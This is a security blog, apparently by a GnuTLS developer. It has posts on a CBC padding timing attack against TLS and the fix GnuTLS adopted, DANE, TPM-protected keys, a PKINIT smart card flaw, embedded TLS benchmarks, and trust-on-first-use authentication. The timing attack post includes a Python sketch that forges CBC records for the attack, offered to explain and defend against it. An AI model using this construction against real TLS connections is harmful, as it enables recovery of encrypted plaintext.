nmav's Blog

Tuesday, February 5, 2013

Time is money (in CBC ciphersuites)

While protocols are not always nicely written, deviating from them has a big disadvantage: you cannot blame someone else if there is a problem. It has a small advantage though: you avoid monoculture, and an attack that is applicable to the protocol may not be applicable to you. What happened in the following story is something in between.

But let's start from the beginning. A few months ago I received a paper from Nadhem Alfardan and Kenny Paterson about a new timing attack on TLS CBC ciphersuites. That paper got on my low priority queue since I'm not that impressed by timing attacks. They are nicely done in the lab, but fall short in the field. Nevertheless at some point this attack got my attention because it claimed it could recover a few bits of the plaintext when using GnuTLS over ethernet.

Let's see what the actual scenario is though. In order for the attack to work the client must operate as follows. It connects to a server and sends some data (which will be encrypted); the attacker intercepts the data and terminates the client's connection abnormally. The client then reconnects and resends the same data, again and again.

That is not the typical scenario of TLS, but it is not so unrealistic either (think of a script that does that). The main idea of the attack is that the described attacker can distinguish between different padding values of TLS messages using the available timing information between receipt of a message and server reply (which may just be the TCP tear down messages).

How is that done with GnuTLS? The attacker takes the input ciphertext and forms a message of 20 AES blocks. He then takes the part of the message he's interested in and copies the matching block and its predecessor as the last two encrypted blocks (which contain the MAC and padding).

Then, on every client connection, he XORs the last byte of the penultimate block with a byte of his choice (say Delta, to be consistent with the paper). On every client reconnection he repeats that using a different Delta and waits for the server response (a TLS server notifies the client of decryption failure).
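The construction described above can be sketched in a few lines of Python. This is only an illustration under assumptions: the function name `forge_record` is made up, the captured ciphertext is assumed to be a whole number of AES blocks with the target block preceded by at least one block, and the filler blocks are simply recycled from the captured ciphertext (the text above does not say what the first 18 blocks contain).

```python
BLOCK = 16  # AES block size in bytes


def forge_record(ciphertext: bytes, target_index: int, delta: int,
                 total_blocks: int = 20) -> bytes:
    """Build a forged CBC ciphertext whose last two blocks are the
    (masked) predecessor of the target block and the target block."""
    if len(ciphertext) % BLOCK != 0:
        raise ValueError("ciphertext must be a whole number of blocks")
    if not 0 <= delta <= 255:
        raise ValueError("delta must fit in one byte")
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    if not 1 <= target_index < len(blocks):
        raise ValueError("target block needs a predecessor")

    prev, target = blocks[target_index - 1], blocks[target_index]
    # XOR Delta into the last byte of the predecessor; after CBC
    # decryption this flips the last plaintext byte of the target block.
    masked_prev = prev[:-1] + bytes([prev[-1] ^ delta])

    # Assumption: the leading blocks are arbitrary filler.
    filler = [blocks[i % len(blocks)] for i in range(total_blocks - 2)]
    return b"".join(filler + [masked_prev, target])


if __name__ == "__main__":
    captured = bytes(range(64))            # stand-in for sniffed ciphertext
    forged = forge_record(captured, target_index=2, delta=0x01)
    print(len(forged) // BLOCK, "blocks")
```

The attacker would send one such record per client reconnection, varying `delta` each time and timing the server's reply.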

In the paper they plot a diagram that shows that certain values of Delta take a different amount of time to receive a reply. I re-implemented the attack for verification, and the measurements on the server can be seen in the following diagram. Note that the last plaintext byte is zero (also note that some attack results in the paper are due to a bug the authors discovered which is now fixed; the discussion here refers to the fixed version of GnuTLS).

Figure 1. Median server timings for AES-CBC-SHA1, for a varying Delta, on GnuTLS 3.1.6 or earlier (view on the server)

It is clear that different values of Delta cause different response times. What we see in these timing results are the differences due to the size of the data being fed to the hash algorithm. In GnuTLS the bigger the Delta, the larger the pad (remember that the last byte of plaintext was zero), and the less time is spent in hashing data.

The small increase in processing time seen on every block is the correctness check of the pad (which takes more time as the pad increases). On the particular CPU I used, the differences per block seem to be around 200 nanoseconds, and the difference between the slowest and the fastest block is around 1 microsecond.

The question is, can an attacker notice such small differences over ethernet? In the paper the authors claim yes (and present some nice figures). I repeated the test, not over the ethernet, but over unix domain sockets, i.e., only delays due to kernel processing are added. Let's see the result.

Figure 2. Median server timings for AES-CBC-SHA1, for a varying Delta, on GnuTLS 3.1.6 or earlier (attacker view)

Although it is noisier, the pattern is still visible. Could we prevent that pattern from being visible? Let's first follow the RFC padding removal precisely and check again.

Figure 3. Median server timings for AES-CBC-SHA1, for a varying Delta, on GnuTLS 3.1.6 with TLS conformant padding check applied (view on the server)

That's much better. Obvious patterns disappeared. However, there is no happy end yet. In the same paper the authors present another attack on OpenSSL, which uses the above padding method. Surprisingly that attack can recover more data than before (but at a slower pace). That's the Full Plaintext recovery attack in the paper, and it uses the fact that TLS 1.2 suggests assuming zero bytes of padding when the padding is found to be incorrect. Zero bytes of padding is an invalid value (padding in TLS is from 1 to 256 bytes) and thus cannot be set by a legitimate message.

This can be exploited to distinguish invalid padding from valid padding, by selecting the message size in such a way that, if 0 is used as pad, the additional byte that will be hashed results in one more full block being processed by the hash algorithm. That is, we would expect that if a correct pad is guessed less processing would occur. Let's visualize it with an example.
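To make the block-boundary argument concrete, here is a rough count of SHA-1 compression function calls for HMAC-SHA1 over a TLS record. It is a sketch under stated assumptions, not code from GnuTLS or the paper: the 13-byte MAC header (sequence number, type, version, length), the 64-byte SHA-1 block, and the 9 bytes of minimum internal SHA-1 padding are standard values, while the 64-byte decrypted record and the function names are chosen purely for illustration.

```python
SHA1_BLOCK = 64      # SHA-1 compression function input size in bytes
SHA1_DIGEST = 20     # SHA-1 output size, also the TLS MAC length here
SHA1_MIN_PAD = 9     # 0x80 marker plus 8-byte length field
TLS_MAC_HEADER = 13  # seq_num(8) + type(1) + version(2) + length(2)


def sha1_compressions(message_len: int) -> int:
    """Compression calls needed to hash message_len bytes."""
    return (message_len + SHA1_MIN_PAD + SHA1_BLOCK - 1) // SHA1_BLOCK


def hmac_sha1_compressions(message_len: int) -> int:
    """Inner hash covers the key block plus the message,
    outer hash covers the key block plus the inner digest."""
    inner = sha1_compressions(SHA1_BLOCK + message_len)
    outer = sha1_compressions(SHA1_BLOCK + SHA1_DIGEST)
    return inner + outer


def mac_compressions(plaintext_len: int, pad_bytes_removed: int) -> int:
    """pad_bytes_removed counts the pad length byte too; use 0 for the
    'assume zero bytes of padding' path taken on invalid padding."""
    data_len = plaintext_len - SHA1_DIGEST - pad_bytes_removed
    return hmac_sha1_compressions(TLS_MAC_HEADER + data_len)


if __name__ == "__main__":
    for removed in (0, 1, 2):
        print(removed, "pad bytes removed:", mac_compressions(64, removed))
```

With a 64-byte decrypted record, removing two or more pad bytes leaves at most 55 bytes of MAC input, which fits one inner block less than the 57 bytes hashed when the padding is rejected and treated as empty. That one compression call is the timing difference the attack looks for.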

Figure 4. Median server timings for AES-CBC-SHA1, for a varying Delta, on a TLS compliant implementation

Notice the lonely point on the bottom left. We can see that when Delta is zero the processing is about 200 nanoseconds faster. For the selected message, the zero Delta resulted in a correct pad. How to fix that? That is pretty tricky.

In order to fix this pattern the code that is doing the CBC pad removal has to be aware of the internal block sizes in the hash, as well as any internal padding used by the hash. In a typical layered implementation (or at least in GnuTLS) that isn't easy. The internal hash block size wasn't available, because one shouldn't need to know that. The paper suggests a fix, that assumes a block size of 64, which is correct for all the HMAC algorithms in TLS, but that isn't future proof (e.g. SHA3 hasn't got the same block size).

So what to do there? The fix for GnuTLS is now similar to the hack described in the paper. The hash block size and knowledge of the internal padding are taken into account to achieve a pretty uniform processing time (see below). Any differences are now at the level of tens of nanoseconds.

Figure 5. Median server timings for AES-CBC-SHA1, for a varying Delta, after work-around is applied

Now we're very close to a happy end. What is important though, is to prevent a similar attack from occurring next year. This isn't a new attack; even the TLS 1.1 protocol acknowledges that timing channel, but does nothing to solve it. TLS implementations now need to have 2-3 pages of code just to remove the CBC padding, and that makes it clear that the TLS spec is broken and needs to be updated.

Together with Alfredo Pironti we proposed a new padding mechanism, one of whose goals is to eliminate that CBC padding issue (the other goal is to allow arbitrary padding in any ciphersuite). The timing channels in CBC padding are eliminated by considering the pad as part of the transferred data (i.e., it is properly authenticated). As such the pad check code does not provide any side-channel information, because it operates only after the MAC is verified.

PS. Kudos go to Oscar Reparaz for long discussions on side channel attacks.

PS2. I should note that Nadhem and Kenny were very kind to notify me of the bugs and the attack. While this may seem like the obvious thing to do, it is not that common with other academic authors (I'm very tempted to place a link here).

Monday, October 8, 2012

Some thoughts on the DANE protocol

A while ago I wrote about why we need an alternative authentication method in TLS. Then I described the SSH-style authentication and how it was implemented in GnuTLS. Another approach is the DANE protocol. It uses the hierarchical model of DNSSEC to provide an alternative authentication method in TLS.

DNSSEC uses a hierarchical model similar to a single root CA that is delegating CA responsibilities to each individual domain holder for its domain. In DANE a DNSSEC-enabled domain may sign entries for each TLS server in the domain. The entries contain information, such as the hash, of the TLS server's certificate. That's a nice idea and can be used instead, or in addition to the existing commercial CA verification. Let's see two examples that demonstrate DANE. Let's suppose we have an HTTPS server called www.example.com and a CA.

A typical web client, after it successfully verifies www.example.com's certificate using the CA's certificate, will check the DANE entries. If they match, it is assured that a CA compromise does not affect its current connection. That is, in this scenario, an attacker needs not only to compromise example.com's CA, but also to compromise the server's DNS domain service.

Another significant example is when there is no CA at all. The server www.example.com is a low-budget one and wants to avoid paying any commercial CA. If it has DNSSEC set up then it just advertises its key on the DNS and clients can verify its certificate using the DNSSEC signature. That is, the trust is moved from the commercial CAs to the DNS administrators. Whether they can cope with that will be seen in time.

Even though the whole idea is attractive, the actual protocol is (IMO) quite bloated. In a recent post on the DANE mailing list I summarized several issues (note that I was wrong on the first). The most important, I believe, is the fact that DANE separates certificates into CA signed certificates and self-signed certificates. That is, if you have a CA signed certificate you mark it in the DNS entry as 1, while if you have a self-signed one you mark it as 3. The reasoning behind this is unclear, but its effect is that it is harder to move from the CA signed to the non-CA signed world or vice-versa. That is, if you have a CA signed certificate and it expires, the DANE entry automatically becomes invalid as well. This may be considered a good property by some (especially the CAs), but I don't see much point in that. It is also impossible for the server administrator to know whether a client trusts its CA, thus this certificate distinction doesn't always make sense. A work-around is to always have your certificates marked as both self-signed and CA signed in two different DNS entries.
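As an illustration of the work-around, the sketch below builds two DANE entries for the same certificate, one marked 1 and one marked 3, and shows the kind of hash comparison a client would perform. It is a simplified assumption-laden example: the function names are hypothetical, only the full-certificate selector (0) is handled, the certificate is a placeholder byte string rather than real DER, and the DNSSEC validation of the entries themselves is left out entirely.

```python
import hashlib
import hmac


def tlsa_matches(cert_der: bytes, matching_type: int, association: bytes) -> bool:
    """Compare a certificate against the data of one DANE entry.
    matching_type: 0 = exact bytes, 1 = SHA-256, 2 = SHA-512."""
    if matching_type == 0:
        candidate = cert_der
    elif matching_type == 1:
        candidate = hashlib.sha256(cert_der).digest()
    elif matching_type == 2:
        candidate = hashlib.sha512(cert_der).digest()
    else:
        raise ValueError("unknown matching type")
    return hmac.compare_digest(candidate, association)


def tlsa_entries_for(cert_der: bytes):
    """Return (usage, selector, matching_type, data) tuples that mark the
    same certificate both as CA signed (1) and as self-signed (3)."""
    digest = hashlib.sha256(cert_der).digest()
    return [(1, 0, 1, digest), (3, 0, 1, digest)]


if __name__ == "__main__":
    cert = b"placeholder for the server certificate in DER form"
    for usage, selector, mtype, data in tlsa_entries_for(cert):
        print(usage, selector, mtype, data.hex(), tlsa_matches(cert, mtype, data))
```

A client that does not trust the server's CA can still accept the entry marked 3, while one that does can additionally apply its usual CA verification with the entry marked 1.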

Despite this and a few other shortcomings that worry me, this is the best protocol we have so far to divide the trust for TLS certificate verification among more entities than the commercial CAs. For this reason, a companion library implementing DANE will be included in the upcoming GnuTLS 3.1.3 release.

Thursday, August 16, 2012

Using the Trusted Platform Module to protect your keys

There was a lot of hype when the Trusted Platform Module (TPM) was introduced into computers. Briefly, it is a co-processor in your PC that allows it to perform calculations independently of the main processor. This has good and bad side-effects. In this post we focus on the good ones, namely that you can use it to perform cryptographic operations the same way as with a smart card. What does that mean? It simply means that you can have RSA keys in your TPM chip that you can use to sign and/or decrypt but cannot extract. That way a compromised web server doesn't necessarily mean a compromised private key.

GnuTLS 3.1.0 (when compiled with libtrousers) adds support for keys stored in the TPM chip. This support is transparent, and such keys can be used similarly to keys stored in files. What is required is that TPM keys are specified using a URI in one of the following forms.

tpmkey:uuid=c0208efa-8fe3-431a-9e0b-b8923bb0cdc4;storage=system
tpmkey:file=/path/to/the/tpmkey

The first URI contains a UUID which is an identifier of the key, and the storage area of the chip (TPM allows for system and user keys). The latter URI is used for TPM keys that are stored outside the TPM storage area, i.e., in an (encrypted by the TPM) file.
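For scripts that need to tell the two URI forms apart, a small parser along these lines may help. It is only a sketch based on the two examples above: `parse_tpmkey` is a hypothetical helper, not part of GnuTLS, and it assumes the part after `tpmkey:` is a semicolon-separated list of `name=value` fields.

```python
def parse_tpmkey(uri: str) -> dict:
    """Split a tpmkey URI into its name=value fields."""
    scheme, sep, rest = uri.partition(":")
    if scheme != "tpmkey" or not sep or not rest:
        raise ValueError("not a tpmkey URI: %r" % uri)
    fields = {}
    for part in rest.split(";"):
        name, eq, value = part.partition("=")
        if not eq or not name:
            raise ValueError("malformed field: %r" % part)
        fields[name] = value
    return fields


if __name__ == "__main__":
    registered = parse_tpmkey(
        "tpmkey:uuid=c0208efa-8fe3-431a-9e0b-b8923bb0cdc4;storage=system")
    on_disk = parse_tpmkey("tpmkey:file=/path/to/the/tpmkey")
    # A key registered in the TPM carries a uuid, a file-backed key a path.
    print("uuid" in registered, "file" in on_disk)
```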

Let's see how we can generate a TPM key, and use it for TLS authentication. We'll need to generate a key and the corresponding certificate. The following command generates a key which will be stored in the TPM's user section.

$ tpmtool --generate-rsa --bits 2048 --register --user

The output of the command is the key ID.

tpmkey:uuid=58ad734b-bde6-45c7-89d8-756a55ad1891;storage=user

So now that we have the ID of the key, let's extract the public key from it.

$ tpmtool --pubkey "tpmkey:uuid=58ad734b-bde6-45c7-89d8-756a55ad1891;storage=user" --outfile=pubkey.pem

And given the public key we can easily generate a certificate using the following command.

$ certtool --generate-certificate --outfile cert.pem --load-privkey "tpmkey:uuid=58ad734b-bde6-45c7-89d8-756a55ad1891;storage=user" --load-pubkey pubkey.pem --load-ca-certificate ca-cert.pem --load-ca-privkey ca-key.pem

The generated certificate can now be used with any program using the gnutls library, such as gnutls-cli to connect to a server. For example:

$ gnutls-cli --x509keyfile "tpmkey:uuid=58ad734b-bde6-45c7-89d8-756a55ad1891;storage=user" --x509certfile cert.pem -p 443 my_host.name

An easy to notice issue with TPM keys is that they are not mnemonic. There is only a UUID identifying the key, but no labels, which makes distinguishing between multiple keys a troublesome task. Nevertheless, TPM keys provide a cheap way to protect keys used in your system.

Wednesday, April 18, 2012

A flaw in the smart card Kerberos (PKINIT) protocol

Reading security protocols is neither always fun nor easy. Protocols like public key Kerberos are hard to read because they just define the packet format and expect the reader to assume a correct message sequence. I read it, nevertheless, because I was interested in the protocol's interaction with smart cards. If you are not aware of the protocol, public key Kerberos or PKINIT is the protocol used in Microsoft Active Directory and described in RFC 4556.

The idea of the protocol is to extend traditional Kerberos, which supports only symmetric ciphers, with digital signatures and public key encryption in order to support stock smart cards. A use-case is, for example, logging in to a Windows domain using a smart card. The protocol itself doesn't mention smart cards at all, probably because that was thought of as a deployment issue. Nevertheless, it was believed to be a secure protocol and several published papers provided proofs of security for all operational modes of the protocol.

However, the protocol has an important flaw, one that makes it insecure if used with smart cards. I wrote a detailed report on the flaw, but the main idea is that if someone has access to your smart card for a few minutes, he can log in using your credentials at any time in the future. You may think that an attack like that can be prevented by never lending your smart card to anyone, but how can you prove that no-one borrowed it for a while? Or if you believe the smart card PIN would protect against theft, how could you know that the reader you are inserting your card into hasn't been tampered with? And in a protocol with smart cards you'd expect the tampered reader not to be able to use the card after you retrieve it. This is not the case, making the protocol unsuitable for smart cards, its primary use-case.

The most interesting issue, however, is the security proofs. The protocol was proven secure, but because the protocol never mentioned smart cards, researchers proved its security in a different setting than the actual use cases. So when reading a security proof, always check the assumptions, which are as important as the proof itself.

A few things went wrong with the design of this protocol, none of which is actually technical. The protocol is hard to read, and in order to get an overview of it, you have to read the whole RFC. This is just bad. If you check figure 1 in the TLS RFC you get an overview of the protocol immediately. You might not know the actual contents of the messages but the sequence is apparent. This is not possible in the Kerberos protocol, and that discourages anyone who might want to understand the protocol using a high level description of it. Another flaw is that the protocol doesn't mention smart cards, its primary use-case. Smart cards were treated as a deployment issue, and readers of the RFC would never know about them. The latter issue occurs in many of the IETF protocols, where readers are expected to know where and how the protocol is used. As demonstrated by the security proofs in a different setting, this is not the case.

So, what can be done to mitigate the flaw? Unfortunately, without modifying the protocol, the only advice that can be given is something along the lines of:

make sure you always possess the card;
make sure you never use a tampered smart card reader.

This may seem pretty useless in a typical working environment. What makes the attack nasty is that if an adversary tampers with your reader, and you use your card with it now, the adversary can perform a transaction a year later, when you'll have no clue about what happened and there might be no evidence of the tampered reader.

Sunday, April 1, 2012

TLS in embedded systems

In some embedded systems space may often be a serious constraint. However, there are many such systems that contain several megabytes of flash, either as an SD memory card or as raw NAND, and have no real space constraint. For those systems, using a TLS implementation such as GnuTLS or OpenSSL would provide performance gains that are not possible with the smaller implementations that target small size. That is because both of the above implementations, unlike the constrained ones, support cryptodev-linux to take advantage of cryptographic accelerators, widely present in several constrained CPUs, and support elliptic curves to optimize performance when perfect forward secrecy is required.

I happened to have an old geode (x86 compatible) CPU which contained an AES accelerator, so here are some benchmarks created using the nxweb/GnuTLS and nginx/OpenSSL web servers and the httpress utility. The figure on the right shows the data transferred per second using AES in CBC mode, with the cryptographic accelerator compared to GnuTLS' and OpenSSL's software implementations. We can clearly see that download speed almost doubles on a big file transfer when using the accelerator.

The figure on the left shows a comparison of the various key exchange methods on this platform using GnuTLS and OpenSSL. The benchmark measures HTTPS transactions per second, and the keys and parameters used are the same for both implementations. The key sizes are selected to be of equivalent security levels (1776 bits in RSA and DH are equivalent to 192 bits in ECDH according to ECRYPT II recommendations). We can see that the elliptic curve version of Diffie-Hellman (ECDHE-RSA) allows 25% more transactions in both implementations compared to Diffie-Hellman on a prime field (DHE-RSA). The plain RSA key exchange remains the fastest, at the cost of sacrificing perfect forward secrecy.

As a side-note, it is nice to see that at the security level of 192 bits GnuTLS outperforms OpenSSL on this processor. The trend continues at higher security levels for the RSA and DHE-RSA methods, but the ECDHE-RSA method is interesting: even though OpenSSL has a more efficient elliptic curve implementation, GnuTLS' usage of nettle and GMP (which provide a faster RSA implementation) compensates, and their performance is almost identical.

Overall, in the few embedded systems that I've worked on, space was not a crucial limiting factor, and it was mainly this work that drove me into updating cryptodev for linux. In those systems the space cost incurred by the usage of a larger library was compensated for by (1) the off-loading to the crypto processor of operations that would otherwise load the CPU and (2) the reduction in processing time due to elliptic curves.
However, this balance is system specific and what was important for my needs would not cover everyone else's, so it is important to weigh the advantages and disadvantages of cryptographic implementations on your own system.

Sunday, March 18, 2012

Google summer of code

This year GnuTLS participates in the Google summer of code under the GNU project umbrella. If you are a student willing to spend this summer coding, check our ideas.

Saturday, February 18, 2012

The need for SSH-like authentication in TLS

After the Diginotar CA compromise it is apparent that verifying web sites using only a trusted certificate authority (CA) is not sufficient. Currently a web site's certificate is verified against the CA that issued it and checked for revocation using the OCSP server the CA set up. If the CA is trusted by the user, this process protects against man-in-the-middle attacks when visiting such a web site, and also against leakage of the web site's private key (e.g. via OCSP, as long as the leakage is reported to the CA). This is an automatic process that does not require the user to be involved, but it comes at a cost. There is a single channel for verification, the CA.

The certificate based web-site verification tries to carry the trust we have in a merchant over to the digital world. That is currently done by having "few" authorities that provide certificates to the merchants, and we are expected to base our decisions on those certificates. However, trust in trade requires more than that. For example, wouldn't a merchant who approached you in a parking lot to sell you a laptop raise suspicions, even if he handed you a legitimate-looking business card? Would his business or credentials card be the only thing to check? Those heuristics are unfortunately not currently available in the digital world.

If it wasn't for the Chrome browser, which implemented a preliminary version of key pinning, the Diginotar compromise might not have been uncovered. For the maliciously-issued certificates, the automatic verification procedure was not reporting any problems. It was the change in public key that triggered the key pinning warning and eventually led to the Diginotar issue becoming public. Thus having an additional verification channel to standard PKI proved to be a success.

Key pinning, as of the 01 draft, is mostly server driven. That is, the user has very little control over trusting a particular server key if the server operator doesn't ask for it. Another approach is the typical authentication method of SSH programs: trust on first use. That describes the concept where the public key of the peer is not verified, or is verified out-of-band, on the first connection, but subsequent connections to the same peer require the public key to remain the same. That approach has the advantage that it doesn't depend on the server operator setting up anything, but also the disadvantage that the user will be bugged every time the server changes its public key.
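The trust on first use idea fits in a few lines. The following is a minimal sketch, assuming an in-memory store keyed by host and port and a SHA-256 fingerprint of the peer's public key; the class and method names are made up for illustration and do not correspond to any SSH or GnuTLS interface.

```python
import hashlib


class TofuStore:
    """Remember the first public key seen for each peer and flag changes."""

    def __init__(self):
        self._pins = {}  # (host, port) -> hex fingerprint

    def check(self, host: str, port: int, pubkey: bytes) -> str:
        fingerprint = hashlib.sha256(pubkey).hexdigest()
        known = self._pins.get((host, port))
        if known is None:
            # First contact: nothing to compare against, so store the key.
            self._pins[(host, port)] = fingerprint
            return "new"
        return "match" if known == fingerprint else "mismatch"


if __name__ == "__main__":
    store = TofuStore()
    print(store.check("www.example.com", 443, b"key A"))
    print(store.check("www.example.com", 443, b"key A"))
    print(store.check("www.example.com", 443, b"key B"))
```

A "mismatch" result is the point where the user gets bugged: it may be a legitimate key change or a man-in-the-middle, and the store alone cannot tell which.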

In any case having such methods to complement standard certificate verification and revocation checks, provides an additional layer of security. With such a layer, a CA compromise would not be enough for a large-scale man-in-the-middle attack since changes in the public keys would be detected and users would be warned. Such warnings might not be entirely successful in preventing all users from continuing but would raise suspicions for the legitimacy of the server, which might be enough.

For that, we implemented in GnuTLS a framework to be used by applications that want to use either key pinning or trust on first use (TOFU) authentication. It consists of three helper functions that store and verify the public keys. They can be seen in the GnuTLS manual. The included program gnutls-cli has also been modified to support a hybrid authentication that includes certificate authentication, TOFU and OCSP if the --tofu and --ocsp arguments are specified. The main idea of its operation is the one discussed here and is shown in this example code in the manual.